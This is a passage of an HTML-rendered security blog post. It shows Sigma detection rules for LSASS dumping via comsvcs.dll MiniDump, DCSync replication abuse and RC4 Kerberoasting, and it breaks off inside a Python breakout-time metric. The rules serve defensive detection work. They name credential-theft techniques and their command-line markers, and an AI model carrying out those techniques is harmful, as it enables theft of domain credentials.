style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"checkpoint-3-credential-dumping-detection\">Checkpoint 3: Credential Dumping Detection<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#checkpoint-3-credential-dumping-detection\" class=\"hash-link\" aria-label=\"Direct link to Checkpoint 3: Credential Dumping Detection\" title=\"Direct link to Checkpoint 3: Credential Dumping Detection\" translate=\"no\">​</a></h3>\n<p><strong>comsvcs.dll MiniDump  Sigma rule:</strong></p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">title</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> LSASS Dump via comsvcs.dll MiniDump</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">status</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> production</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">description</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> Detects LSASS memory dump using the built</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\">in comsvcs.dll MiniDump export</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">logsource</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">category</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> process_creation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">product</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> windows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">detection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">selection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">EventID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4688</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">NewProcessName|endswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'\\rundll32.exe'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">CommandLine|contains|all</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'comsvcs'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MiniDump'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">condition</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> selection</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">falsepositives</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> None known</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">level</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> critical</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.credential_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.t1003.001</span><br></span></code></pre></div></div>\n<p><strong>DCSync Sigma rule:</strong></p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">title</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> DCSync Attack </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> Replication Rights Abuse</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">status</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> production</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">description</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  Detects DCSync by identifying replication rights exercised</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  by a non-computer, non-DC account</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">logsource</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">product</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> windows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">service</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">detection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">selection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">EventID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4662</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">Properties|contains</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># DS-Replication-Get-Changes</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'</span><span class=\"token plain\">   </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># DS-Replication-Get-Changes-All</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">filter_computer_accounts</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">SubjectUserName|endswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'$'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">filter_known_dc_sync</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">SubjectUserName|startswith</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'MSOL_'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'AADConnect'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">condition</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> selection and not filter_computer_accounts and not filter_known_dc_sync</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">falsepositives</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> Azure AD Connect sync accounts (add to filter)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">level</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> critical</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.credential_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.t1003.006</span><br></span></code></pre></div></div>\n<p><strong>Kerberoasting RC4  Sigma rule:</strong></p>\n<div class=\"language-yaml codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-yaml codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">title</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> Kerberoasting </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> RC4 TGS Request for AES</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\">Capable Account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">status</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> production</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">description</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">&gt;</span><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  Detects Kerberos TGS requests using RC4 encryption for accounts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token scalar string\" style=\"color:hsl(139, 66%, 32%)\">  that should be requesting AES. Indicates potential Kerberoasting.</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">logsource</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">product</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> windows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">service</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">detection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">selection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">EventID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">4769</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">TicketEncryptionType</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'0x17'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">TicketOptions</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'0x40810000'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">filter_legit</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">ServiceName</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'krbtgt'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">condition</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> selection and not filter_legit</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">falsepositives</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> Legacy systems without AES support (document and exclude)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">level</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> high</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token key atrule\" style=\"color:hsl(356, 75%, 47%)\">tags</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.credential_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">-</span><span class=\"token plain\"> attack.t1558.003</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-5--building-a-breakout-timer-metric-for-your-soc\">Section 5  Building a Breakout Timer Metric for Your SOC<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-5--building-a-breakout-timer-metric-for-your-soc\" class=\"hash-link\" aria-label=\"Direct link to Section 5  Building a Breakout Timer Metric for Your SOC\" title=\"Direct link to Section 5  Building a Breakout Timer Metric for Your SOC\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"measuring-breakout-time-internally\">Measuring Breakout Time Internally<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#measuring-breakout-time-internally\" class=\"hash-link\" aria-label=\"Direct link to Measuring Breakout Time Internally\" title=\"Direct link to Measuring Breakout Time Internally\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> pandas </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> pd</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">from</span><span class=\"token plain\"> datetime </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">calculate_breakout_time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">\"\"\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    incident_events: DataFrame with columns:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">      timestamp, host, event_type, description</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token triple-quoted-string string\" style=\"color:hsl(139, 66%, 32%)\">    \"\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    initial_host </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">isin</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'c2_beacon'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'payload_execution'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'malicious_macro'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sort_values</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">iloc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    t_access </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> initial_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    source_host </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> initial_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span 